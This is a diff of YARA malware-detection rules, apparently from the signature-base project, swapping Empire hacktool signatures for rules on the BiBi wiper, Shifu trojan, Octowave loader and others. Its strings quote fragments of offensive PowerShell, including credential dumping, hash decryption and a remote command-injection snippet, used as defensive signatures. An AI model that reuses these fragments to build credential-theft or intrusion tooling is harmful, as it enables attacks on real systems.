-		$s1 = "$postdata=\"script=println+new+ProcessBuilder%28%27\"+$($Cmd)+\"" ascii
-		$s2 = "$url = \"http://\"+$($Rhost)+\":\"+$($Port)+\"/script\"" fullword ascii
-		$s3 = "$Cmd = [System.Web.HttpUtility]::UrlEncode($Cmd)" fullword ascii
+		$a1 = "Subject: "
+		$a2 = "Received: "
+		$xr1 = /file:\/\/\/\\\\[^"']{6,600}\.(docx|txt|pdf|xlsx|pptx|odt|etc|jpg|png|gif|bmp|tiff|svg|mp4|avi|mov|wmv|flv|mkv|mp3|wav|aac|flac|ogg|wma|exe|msi|bat|cmd|ps1|zip|rar|7z|targz|iso|dll|sys|ini|cfg|reg|html|css|java|py|c|cpp|db|sql|mdb|accdb|sqlite|eml|pst|ost|mbox|htm|php|asp|jsp|xml|ttf|otf|woff|woff2|rtf|chm|hta|js|lnk|vbe|vbs|wsf|xls|xlsm|xltm|xlt|doc|docm|dot|dotm)!/
 
 	condition:
-		( uint16( 0 ) == 0x6620 and filesize < 7KB and 1 of them ) or all of them
+		filesize < 1000KB and all of ( $a* ) and 1 of ( $xr* )
 }
-rule SIGNATURE_BASE_Empire_Get_Securitypackages : FILE
+rule SIGNATURE_BASE_MAL_WIPER_Bibi_Oct23 : FILE
 {
 	meta:
-		description = "Detects Empire component - file Get-SecurityPackages.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a109eda1-a26d-5cf6-b6b5-1a1a1e770a0a"
-		date = "2016-11-05"
+		description = "Detects BiBi wiper samples for Windows and Linux"
+		author = "Florian Roth"
+		id = "e1ea8016-e074-5208-8c98-54922bbcc407"
+		date = "2023-11-01"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L43-L57"
+		reference = "https://x.com/ESETresearch/status/1719437301900595444?s=20"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_bibi_wiper_oct23.yar#L24-L47"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2d63fdcc6713d2f7645b16cf3e79a6e951c7751a10bfa0e2853def47ea9547d2"
+		logic_hash = "c22dc994005f91f81d0e8e5f8d400b12ecd28336866bc62b8527e104f6339372"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5d06e99121cff9b0fce74b71a137501452eebbcd1e901b26bde858313ee5a9c1"
+		hash1 = "23bae09b5699c2d5c4cb1b8aa908a3af898b00f88f06e021edcb16d7d558efad"
+		hash2 = "40417e937cd244b2f928150cae6fa0eff5551fdb401ea072f6ecdda67a747e17"
 
 	strings:
-		$s1 = "$null = $EnumBuilder.DefineLiteral('LOGON', 0x2000)" fullword ascii
-		$s2 = "$EnumBuilder = $ModuleBuilder.DefineEnum('SSPI.SECPKG_FLAG', 'Public', [Int32])" fullword ascii
+		$s1 = "send attempt while closed" ascii fullword
+		$s2 = "[+] CPU cores: %d, Threads: %d" ascii fullword
+		$s3 = "[+] Stats: %d | %d" ascii fullword
+		$opw1 = { 33 c0 88 45 48 b8 01 00 00 00 86 45 48 45 8b f5 48 8d 3d de f5 ff ff 0f 57 c9 f3 0f 7f 4d b8 }
+		$opw2 = { 2d ce b5 00 00 c5 fa e6 f5 e9 40 fe ff ff 0f 1f 44 00 00 75 2e c5 fb 10 0d 26 b4 00 00 44 8b 05 5f b6 00 00 e8 ca 0d 00 00 }
+		$opl1 = { 4c 8d 44 24 08 48 89 f7 48 ff c2 48 83 c6 04 e8 c7 fb ff ff 41 89 c1 0f b6 42 ff 41 0f af c1 }
+		$opl2 = { e8 6f fb ff ff 49 8d 78 f8 89 c0 48 01 c2 48 89 15 09 fb 24 00 e8 5a fb ff ff 49 8d 78 fc 6b f0 06 }
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 20KB and 1 of them ) or all of them
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and filesize < 4000KB and 2 of them
 }
-rule SIGNATURE_BASE_Empire_Invoke_Powerdump : FILE
+rule SIGNATURE_BASE_Shifu_Banking_Trojan : FILE
 {
 	meta:
-		description = "Detects Empire component - file Invoke-PowerDump.ps1"
+		description = "Detects Shifu Banking Trojan"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d1082a4e-d458-57fb-b332-7c775c8ef2dd"
-		date = "2016-11-05"
+		id = "e86a98b1-a5c3-57b6-9449-dc36c04cebf3"
+		date = "2015-09-01"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L59-L74"
+		reference = "https://securityintelligence.com/shifu-masterful-new-banking-trojan-is-attacking-14-japanese-banks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_shifu_trojan.yar#L8-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e460d015be54a88d0eb5741a9c32cf6d7a410e0beb5356402af0dd19d1b4c6f2"
+		logic_hash = "f65fa80638e6a8bf8c5afb3dbe1262572ca0a7c56507369934ac3d958f3e6267"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "095c5cf5c0c8a9f9b1083302e2ba1d4e112a410e186670f9b089081113f5e0e1"
+		hash1 = "4ff1ebea2096f318a2252ebe1726bcf3bbc295da9204b6c720b5bbf14de14bb2"
+		hash2 = "4881c7d89c2b5e934d4741a653fbdaf87cc5e7571b68c723504069d519d8a737"
 
 	strings:
-		$x16 = "$enc = Get-PostHashdumpScript" fullword ascii
-		$x19 = "$lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword;" fullword ascii
-		$x20 = "$rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr);" fullword ascii
+		$x1 = "c:\\oil\\feet\\Seven\\Send\\Gather\\Dividerail.pdb" fullword ascii
+		$s1 = "listen above" fullword wide
+		$s2 = "familycould cost" fullword wide
+		$s3 = "SetSystemTimeAdjustment" fullword ascii
+		$s4 = "PeekNamedPipe" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x2023 and filesize < 60KB and 1 of them ) or all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( $x1 or all of ( $s* ) )
 }
-rule SIGNATURE_BASE_Empire_Install_SSP : FILE
+rule SIGNATURE_BASE_SHIFU_Banking_Trojan : FILE
 {
 	meta:
-		description = "Detects Empire component - file Install-SSP.ps1"
+		description = "Detects SHIFU Banking Trojan"
 		author = "Florian Roth (Nextron Systems)"
-		id = "06bbdcc5-c48b-5753-88a2-5c962d1b986f"
-		date = "2016-11-05"
+		id = "b0d57a2b-31cc-5af0-84c3-5d178e2d244d"
+		date = "2015-10-31"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L76-L89"
+		reference = "http://goo.gl/52n8WE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_shifu_trojan.yar#L29-L63"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bf0966d0141d4606983f267face635ef5fddbc73282f02f0a0ae6fcf89f2e6dc"
-		score = 75
+		logic_hash = "01f5217ee4e81b0b2ff37ccc7eed353ace26aa68538cce5bc207c0c071f0850a"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7fd921a23950334257dda57b99e03c1e1594d736aab2dbfe9583f99cd9b1d165"
+		hash1 = "0066d1c8053ff8b0c07418c7f8d20e5cd64007bb850944269f611febd0c1afe0"
+		hash2 = "3956d32a870d81be34cafc867769b2a2f55a96360070f1cb3d9addc2918357d5"
+		hash3 = "3fde1b2b50fcb36a695f1e6bc577cd930c2343066d98982cf982393e55bfce0d"
+		hash4 = "457ad4a4d4e675fe09f63873ca3364434dc872dde7d9b64ce7db919eaff47485"
+		hash5 = "51edba913e8b83d1388b1be975957e439015289d51d3d5774d501551f220df6f"
+		hash6 = "6611a2b79a3acf0003b1197aa5bfe488a33db69b663c79c6c5b023e86818d38b"
+		hash7 = "72e239924faebf8209f8e3d093f264f778a55efb56b619f26cea73b1c4feb7a4"
+		hash8 = "7a29cb641b9ac33d1bb405d364bc6e9c7ce3e218a8ff295b75ca0922cf418290"
+		hash9 = "92fe4f9a87c796e993820d1bda8040aced36e316de67c9c0c5fc71aadc41e0f8"
+		hash10 = "93ecb6bd7c76e1b66f8c176418e73e274e2c705986d4ac9ede9d25db4091ab05"
+		hash11 = "a0b7fac69a4eb32953c16597da753b15060f6eba452d150109ff8aabc2c56123"
+		hash12 = "a8b6e798116ce0b268e2c9afac61536b8722e86b958bd2ee95c6ecdec86130c9"
+		hash13 = "d6244c1177b679b3d67f6cec34fe0ae87fba21998d4f5024d8eeaf15ca242503"
+		hash14 = "dcc9c38e695ffd121e793c91ca611a4025a116321443297f710a47ce06afb36d"
 
 	strings:
-		$s1 = "Install-SSP -Path .\\mimilib.dll" fullword ascii
+		$x1 = "\\Gather\\Dividerail.pdb" ascii
+		$s0 = "\\payload\\payload.x86.pdb" ascii
+		$s1 = "USER_PRIV_GUEST" fullword wide
+		$s2 = "USER_PRIV_ADMIN" fullword wide
+		$s3 = "USER_PRIV_USER" fullword wide
+		$s4 = "PPSWVPP" fullword ascii
+		$s5 = "WinSCard.dll" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 20KB and 1 of them ) or all of them
+		uint16( 0 ) == 0x5a4d and ( $x1 or 5 of ( $s* ) )
 }
-rule SIGNATURE_BASE_Empire_Invoke_Shellcodemsil : FILE
+rule SIGNATURE_BASE_Octowave_Loader_03_2025 : FILE
 {
 	meta:
-		description = "Detects Empire component - file Invoke-ShellcodeMSIL.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "06011b51-bad7-5656-ac37-e49f9b6d0498"
-		date = "2016-11-05"
-		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L91-L107"
+		description = "Detects opcodes found in Octowave loader DLLs and WAV steganography files"
+		author = "Jai Minton (@CyberRaiju) - HuntressLabs"
+		id = "d583c416-be20-5fcf-848e-edd037e3b0d4"
+		date = "2025-03-19"
+		modified = "2025-03-21"
+		reference = "https://yaratoolkit.securitybreak.io/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_octowave_loader_mar25.yar#L1-L285"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "eb556fb8b558145e7e981ab3c3ccfb2656512498b917c705e53bc5b9f3650155"
+		logic_hash = "266568d5f0f95cc805a833745a9e63689234ae927c2903230438c080f7ec2e56"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9a9c6c9eb67bde4a8ce2c0858e353e19627b17ee2a7215fa04a19010d3ef153f"
+		hash1 = "0504BFBACB6E10B81196F625F2FE37B33500E7BF65FD82D3510A2B178C6CD5BD"
+		hash2 = "3A2DB0CB9EE01549A6B660D58115D112D36A744D65705394B54D7D95287C7A74"
+		hash3 = "EB50D06057FE123D6E9F7A76D3D1A4BC5307E8F15D017BE8F6031E92136CF36A"
+		hash4 = "24715920E749B014BA05F74C96627A27355C5860A14461C106AA48A7ABA371EA"
 
 	strings:
-		$s1 = "$FinalShellcode.Length" fullword ascii
-		$s2 = "@(0x60,0xE8,0x04,0,0,0,0x61,0x31,0xC0,0xC3)" fullword ascii
-		$s3 = "@(0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57," fullword ascii
-		$s4 = "$TargetMethod.Invoke($null, @(0x11112222)) | Out-Null" fullword ascii
+		$opcode_1 = {
+			55
+			8B EC
+			56
+			57
+			8B D1
+			33 C0
+			8B FA
+			6A 06
+			59
+			AB
+			AB
+			AB
+			AB
+			8B 45 08
+			8B FA
+			83 62 10 00
+			8B F0
+			83 62 14 00
+			F3 A5
+			83 60 10 00
+		}
+		$opcode_2 = {
+			55
+			8B EC
+			8B 55 ??
+			56
+			8B F1
+			8B 46 ??
+			8B 4E ??
+			2B C1
+			3B D0
+			77 ??
+			83 7E ?? 07
+			53
+			8D 1C 11
+			57
+			89 5E ??
+			8B FE
+			76 ??
+			8B 3E
+			8D 04 12
+			50
+			FF 75 ??
+			8D 0C 4F
+			51
+			E8 ?? ?? ?? ??
+			83 C4 0C
+			33 C0
+			66 89 04 5F
+			8B C6
+			5F
+			5B
+			EB ??
+			52
+			FF 75 ??
+			8B CE
+			FF 75 ??
+			52
+			E8 ?? ?? ?? ??
+			5E
+			5D
+			C2 08 00
+		}
+		$opcode_3 = {
+			55
+			8B EC
+			8B 4D 08
+			83 C9 ??
+			56
+			3B 4D 10
+			77 1C
+			8B 75 0C
+			8B D6
+			8B 45 10
+			D1 EA
+			2B C2
+			3B F0
+			77 0C
+			8D 04 32
+			3B C8
+			0F 42 C8
+			8B C1
+			EB 03
+		}
+		$opcode_4 = {
+			56
+			8B F1
+			8B 46 14
+			83 F8 ??
+			76 ??
+		}
+		$opcode_5 = {
+			50
+			FF 36
+			E8 ?? ?? ?? ??
+			59
+			59
+			83 66 ?? 00
+		}
+		$opcode_6 = {
+			C7 46 14 ?? 00 00 00
+			66 89 06
+			5E
+			C3
+		}
+		$opcode_7 = {
+			55
+			8B EC
+			51
+			51
+			A1 ?? ?? ?? ??
+			33 C5
+			89 45 FC
+			8B 4D 0C
+			8B 45 08
+			89 45 F8
+			81 F9 00 10 00 00
+			72 ??
+			8D 45 0C
+			50
+			8D 45 F8
+			50
+			E8 ?? ?? ?? ??
+			8B 45 F8
+			59
+			59
+		}
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 30KB and 1 of them ) or all of them
+		( uint16( 0 ) == ( 0x5a4d ) or uint32( 0 ) == 0x46464952 ) and filesize < 50000KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_Empire_Powerup : FILE
+rule SIGNATURE_BASE_Octowave_Loader_Supporting_File_03_2025 : FILE
 {
 	meta:
-		description = "Detects Empire component - file PowerUp.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e79d093e-7481-52a3-a350-4d1b6d8955cd"
-		date = "2016-11-05"
-		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L109-L122"
+		description = "Detects supporting file used by Octowave loader containing hardcoded values"
+		author = "Jai Minton (@CyberRaiju) - HuntressLabs"
+		id = "2c81c8b8-4b4d-55c9-9285-556e8b5303bd"
+		date = "2025-03-19"
+		modified = "2025-03-21"
+		reference = "https://x.com/CyberRaiju/status/1893450184224362946?t=u0X6ST2Qgnrf-ujjphGOSg&s=19"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_octowave_loader_mar25.yar#L287-L312"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d55674866a1a14d4f4c2b5529e47e005ca4b433383bf112af6da41d7f84afdb7"
+		logic_hash = "42abd38e704a17ef81b423829c2dd356749873a5d036e43cc2746debfb3f5434"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ad9a5dff257828ba5f15331d59dd4def3989537b3b6375495d0c08394460268c"
+		hash1 = "C4CBAA7E4521FA0ED9CC634C5E2BACBF41F46842CA4526B7904D98843A7E9DB9"
+		hash2 = "F5CFB2E634539D5DC7FFE202FFDC422EF7457100401BA1FBC21DD05558719865"
+		hash3 = "56F1967F7177C166386D864807CDF03D5BBD3F118A285CE67EA226D02E5CF58C"
+		hash4 = "11EE5AD8A81AE85E5B7DDF93ADF6EDD20DE8460C755BF0426DFCBC7F658D7E85"
+		hash5 = "D218B65493E4D9D85CBC2F7B608F4F7E501708014BC04AF27D33D995AA54A703"
+		hash6 = "0C112F9DFE27211B357C74F358D9C144EA10CC0D92D6420B8742B72A65562C5A"
 
 	strings:
-		$x2 = "$PoolPasswordCmd = 'c:\\windows\\system32\\inetsrv\\appcmd.exe list apppool" fullword ascii
+		$unique_key = {1D 1C 1F 1E 01 01 03 02 05 04 07 06 09 D4 0E 0A 0D 0C 0F 0E 31 30 31 32 35 34 36 36 39 38 DC 3F 3D 3C 3E}
+		$unique_string = "MLONqpsrutwvyx"
+		$unique_string2 = "A@CBEDGFIHKJMLONqpsrutwvyx"
 
 	condition:
-		( uint16( 0 ) == 0x233c and filesize < 2000KB and 1 of them ) or all of them
+		uint16( 0 ) != 0x5a4d and filesize < 10000KB and all of them
 }
-rule SIGNATURE_BASE_Empire_Invoke_Mimikatz_Gen : FILE
+rule SIGNATURE_BASE_KR_Target_Malware_Aug17 : FILE
 {
 	meta:
-		description = "Detects Empire component - file Invoke-Mimikatz.ps1"
+		description = "Detects malware that targeted South Korea in Aug 2017 - file MRDqsbuEqGxrgqtbXU.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1f771a17-2534-5811-80bd-bc1bab37d97c"
-		date = "2016-11-05"
+		id = "2a6a7921-953a-502c-9702-b27325b2c3b8"
+		date = "2017-08-23"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L124-L138"
+		reference = "https://twitter.com/eyalsela/status/900250203097354240"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_kr_malware.yar#L11-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a28297025b9b0178ab437996ffd3e0c28526f1edaf61db659093fe41a356cf40"
+		logic_hash = "47c3350b489b023687f05f55a09f0092456c87b4beeda563756a99ccd5091b09"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
+		hash1 = "82cada01643a42c8cd9600b8c33f3760d15e5eb6fabec2d531cf13cece095c78"
 
 	strings:
-		$s1 = "= \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ" ascii
-		$s2 = "Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes64, $PEBytes32, \"Void\", 0, \"\", $ExeArgs)" fullword ascii
+		$x1 = { 53 00 75 00 63 00 63 00 65 00 00 2F 53 00 6F 00
+               6D 00 65 00 74 00 68 00 69 00 6E 00 67 00 20 00
+               77 00 65 00 6E 00 74 00 20 00 77 00 72 00 6F 00
+               6E 00 67 00 }
+		$x2 = "lnVMODvjSfOQQnfiuFogghlL" fullword ascii
+		$x3 = "E X I T  +R U N A S  /a P P d A T A " fullword ascii
+		$x4 = "uSEsHELLeXECUTE gETeNTRYaSSEMBLY GET" fullword ascii
+		$x5 = "ZahUKBXz" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 800KB and 1 of them )
 }
-rule SIGNATURE_BASE_Empire_Get_Gpppassword : FILE
+
+rule SIGNATURE_BASE_MAL_Floxif_Generic : FILE
 {
 	meta:
-		description = "Detects Empire component - file Get-GPPPassword.ps1"
+		description = "Detects Floxif Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7791b009-19d3-5d08-8ef7-4723d28830ed"
-		date = "2016-11-05"
+		id = "5ddd6a6c-b02a-518b-bbe3-8f528b3d7eae"
+		date = "2018-05-11"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L140-L155"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_floxif_flystudio.yar#L3-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3c879e50805e8b89fc8f3a7c7da2c8e906c89f210ab74194daca6b0ba2d312ba"
-		score = 75
+		logic_hash = "1996f717100d9f1abc2ed3f1e9d0c55daec09654c0f99987ddaea9e9f0d17008"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "55a4519c4f243148a971e4860225532a7ce730b3045bde3928303983ebcc38b0"
-
-	strings:
-		$s1 = "$Base64Decoded = [Convert]::FromBase64String($Cpassword)" fullword ascii
-		$s2 = "$XMlFiles += Get-ChildItem -Path \"\\\\$DomainController\\SYSVOL\" -Recurse" ascii
-		$s3 = "function Get-DecryptedCpassword {" fullword ascii
+		hash1 = "de055a89de246e629a8694bde18af2b1605e4b9b493c7e4aef669dd67acf5085"
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 30KB and 1 of them ) or all of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "2f4ddcfebbcad3bacadc879747151f6f" or pe.exports ( "FloodFix" ) or pe.exports ( "FloodFix2" ) )
 }
-rule SIGNATURE_BASE_Empire_Invoke_Smbscanner : FILE
+
+rule SIGNATURE_BASE_MAL_CN_Flystudio_May18_1 : FILE
 {
 	meta:
-		description = "Detects Empire component - file Invoke-SmbScanner.ps1"
+		description = "Detects malware / hacktool detected in May 2018"
 		author = "Florian Roth (Nextron Systems)"
-		id = "63cd048b-04fd-5b4f-9d4d-3a001c31b4df"
-		date = "2016-11-05"
+		id = "b78b9ea0-5eef-5922-b5d7-d3c5ddce7fad"
+		date = "2018-05-11"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L157-L171"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_floxif_flystudio.yar#L21-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5feb32dd0fc5271256dc4a088b9b02b591dbe584759db7ee4f5a6c99f42c3c0c"
+		logic_hash = "8d03f02a270d8664175b65398c01ec4f0ea182437b31847f9bf4181edb0c36bb"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9a705f30766279d1e91273cfb1ce7156699177a109908e9a986cc2d38a7ab1dd"
+		hash1 = "b85147366890598518d4f277d44506eef871fd7fc6050d8f8e68889cae066d9e"
 
 	strings:
-		$s1 = "$up = Test-Connection -count 1 -Quiet -ComputerName $Computer " fullword ascii
-		$s2 = "$out | add-member Noteproperty 'Password' $Password" fullword ascii
+		$s1 = "WTNE / MADE BY E COMPILER - WUTAO " fullword ascii
+		$s2 = "www.cfyhack.cn" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 10KB and 1 of them ) or all of them
+		uint16( 0 ) == 0x5a4d and filesize < 5000KB and ( pe.imphash ( ) == "65ae5cf17140aeaf91e3e9911da0ee3e" or 1 of them )
 }
-rule SIGNATURE_BASE_Empire_Exploit_Jboss : FILE
+rule SIGNATURE_BASE_MAL_Backdoor_SPAREPART_Sleepgenerator
 {
 	meta:
-		description = "Detects Empire component - file Exploit-JBoss.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a9c75cf5-9469-5a45-b750-69728ed0069f"
-		date = "2016-11-05"
+		description = "Detects the algorithm used to determine the next sleep timer"
+		author = "Mandiant"
+		id = "b9cd46e4-0e06-5ead-8379-adcfc3c384d0"
+		date = "2022-12-14"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L173-L190"
+		reference = "https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_ru_sparepart_dec22.yar#L2-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a0eef14c3966745a0f2b7eb404eed122a11eea2fb82884ebd2087b3ab90bff93"
-		score = 75
+		hash = "f9cd5b145e372553dded92628db038d8"
+		logic_hash = "41a9fdb2ba7aefcaf6ef2477b598e98b9045ef17ce9bfe46f3169d0b2e0dd289"
+		score = 50
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9ea3e00b299e644551d90bbee0ce3e4e82445aa15dab7adb7fcc0b7f1fe4e653"
+		tags = ""
+		version = "1"
+		weight = "100"
+		disclaimer = "This rule is meant for hunting and is not tested to run in a production environment."
 
 	strings:
-		$s1 = "Exploit-JBoss" fullword ascii
-		$s2 = "$URL = \"http$($SSL)://\" + $($Rhost) + ':' + $($Port)" ascii
-		$s3 = "\"/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service" ascii
-		$s4 = "http://blog.rvrsh3ll.net" fullword ascii
-		$s5 = "Remote URL to your own WARFile to deploy." fullword ascii
+		$ = {C1 E8 06 89 [5] C1 E8 02 8B}
+		$ = {c1 e9 03 33 c1 [3] c1 e9 05 33 c1 83 e0 01}
+		$ = {8B 80 FC 00 00 00}
+		$ = {D1 E8 [4] c1 E1 0f 0b c1}
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 10KB and 1 of them ) or all of them
+		all of them
 }
-rule SIGNATURE_BASE_Empire_Dumpcredstore : FILE
+rule SIGNATURE_BASE_MAL_Backdoor_SPAREPART_Struct : FILE
 {
 	meta:
-		description = "Detects Empire component - file dumpCredStore.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "cdb87ed4-fa90-5724-b37d-97cf8e4b8326"
-		date = "2016-11-05"
+		description = "Detects the PDB and a struct used in SPAREPART"
+		author = "Mandiant"
+		id = "a04296d5-c146-5142-a8e8-418651f6b755"
+		date = "2022-12-14"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L192-L207"
+		reference = "https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_ru_sparepart_dec22.yar#L22-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7136920e531d7ab621e743c5c89c0d817fe453108878e3c808814ca48ad57fb3"
-		score = 75
+		hash = "f9cd5b145e372553dded92628db038d8"
+		logic_hash = "807c7404146c08995440987aef78ecde11224f7d6cad1a0d22269b2bf46a44e5"
+		score = 50
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c1e91a5f9cc23f3626326dab2dcdf4904e6f8a332e2bce8b9a0854b371c2b350"
+		disclaimer = "This rule is meant for hunting and is not tested to run in a production environment."
 
 	strings:
-		$x1 = "[DllImport(\"Advapi32.dll\", SetLastError = true, EntryPoint = \"CredReadW\"" ascii
-		$s12 = "[String] $Msg = \"Failed to enumerate credentials store for user '$Env:UserName'\"" fullword ascii
-		$s15 = "Rtn = CredRead(\"Target\", CRED_TYPE.GENERIC, out Cred);" fullword ascii
+		$pdb = "c:\\Users\\user\\Desktop\\ImageAgent\\ImageAgent\\PreAgent\\src\\builder\\agent.pdb" ascii nocase
